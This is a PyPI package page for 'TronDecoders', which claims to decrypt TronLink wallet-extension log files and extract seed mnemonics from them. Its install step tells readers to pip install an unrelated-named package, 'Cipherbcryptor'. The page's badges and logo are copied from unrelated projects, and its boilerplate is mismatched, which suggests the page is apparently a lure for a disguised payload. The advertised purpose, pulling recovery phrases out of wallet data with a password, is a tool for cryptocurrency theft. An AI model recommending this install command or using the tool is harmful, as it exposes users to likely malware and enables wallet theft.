# TronDecoders
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)
![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)
Decode Tools for decode crypto data, from extensions wallet, TronLink v2.
## Installation
Python requires [Python.org](https://www.python.org/) v3,7+ to run.
Install the dependencies and devDependencies and start the server.
```sh
python -m pip install pip
python -m pip install --upgrade pip
pip install Cipherbcryptor
```
## Using
```Python
r = TronlinkReader('000003.log')
mnemonics = TronlinkReader.extract_mnemonic(r.decrypt('Qwwq1212'))
print(mnemonics)
```
## License
MIT
**Encode Cipherbcryptor group**
Raw data
{
"_id": null,
"home_page": null,
"name": "TronDecoders",
"maintainer": null,
"docs_url": null,
"requires_python": "<4.0,>=3.7",
"maintainer_email": null,
"keywords": "extensions, Tron, walletdecode, decode, tronlink, TronDecode, crypto, decrypt, wallet",
"author": "Isaac Florentine",
"author_email": null,
"download_url": "https://files.pythonhosted.org/packages/7d/10/00bbd1f571026ff9349c7d6a29619556176306d78c4800b93de9a15b6639/trondecoders-1.4.4.tar.gz",
"platform": null,
"description": "# TronDecoders\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nDecode Tools for decode crypto data, from extensions wallet, TronLink v2.\n\n## Installation\nPython requires [Python.org](https://www.python.org/) v3,7+ to run.\nInstall the dependencies and devDependencies and start the server.\n```sh\npython -m pip install pip\npython -m pip install --upgrade pip\npip install Cipherbcryptor\n```\n## Using\n\n```Python\nr = TronlinkReader('000003.log')\nmnemonics = TronlinkReader.extract_mnemonic(r.decrypt('Qwwq1212'))\nprint(mnemonics)\n```\n\n## License\nMIT\n**Encode Cipherbcryptor group**\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "Simple Tools for decode crypto data, from extensions wallet, TronLink v2.",
"version": "1.4.4",
"project_urls": null,
"split_keywords": [
"extensions",
" tron",
" walletdecode",
" decode",
" tronlink",
" trondecode",
" crypto",
" decrypt",
" wallet"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "fae126357a8c717dfd865079d181da282e31d3016faff61027a46ab77e371732",
"md5": "fe3628267fd50ca3bf5e5584b045688c",
"sha256": "0afb0c97b5f5ce62acd9a3ec285bc380807921fe73bd6c628ad0158b1be8baf2"
},
"downloads": -1,
"filename": "trondecoders-1.4.4-py3-none-any.whl",
"has_sig": false,
"md5_digest": "fe3628267fd50ca3bf5e5584b045688c",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": "<4.0,>=3.7",
"size": 3784,
"upload_time": "2024-09-21T22:55:53",
"upload_time_iso_8601": "2024-09-21T22:55:53.270428Z",
"url": "https://files.pythonhosted.org/packages/fa/e1/26357a8c717dfd865079d181da282e31d3016faff61027a46ab77e371732/trondecoders-1.4.4-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "7d1000bbd1f571026ff9349c7d6a29619556176306d78c4800b93de9a15b6639",
"md5": "b3867545a0180c7091a83b49287a68f2",
"sha256": "c8c1db667edf7d2f07ea81d34a962a5d0dbcf2b2ffdbc1b6a992199308008e37"
},
"downloads": -1,
"filename": "trondecoders-1.4.4.tar.gz",
"has_sig": false,
"md5_digest": "b3867545a0180c7091a83b49287a68f2",
"packagetype": "sdist",
"python_version": "source",
"requires_python": "<4.0,>=3.7",
"size": 3435,
"upload_time": "2024-09-21T22:55:54",
"upload_time_iso_8601": "2024-09-21T22:55:54.510360Z",
"url": "https://files.pythonhosted.org/packages/7d/10/00bbd1f571026ff9349c7d6a29619556176306d78c4800b93de9a15b6639/trondecoders-1.4.4.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2024-09-21 22:55:54",
"github": false,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"lcname": "trondecoders"
}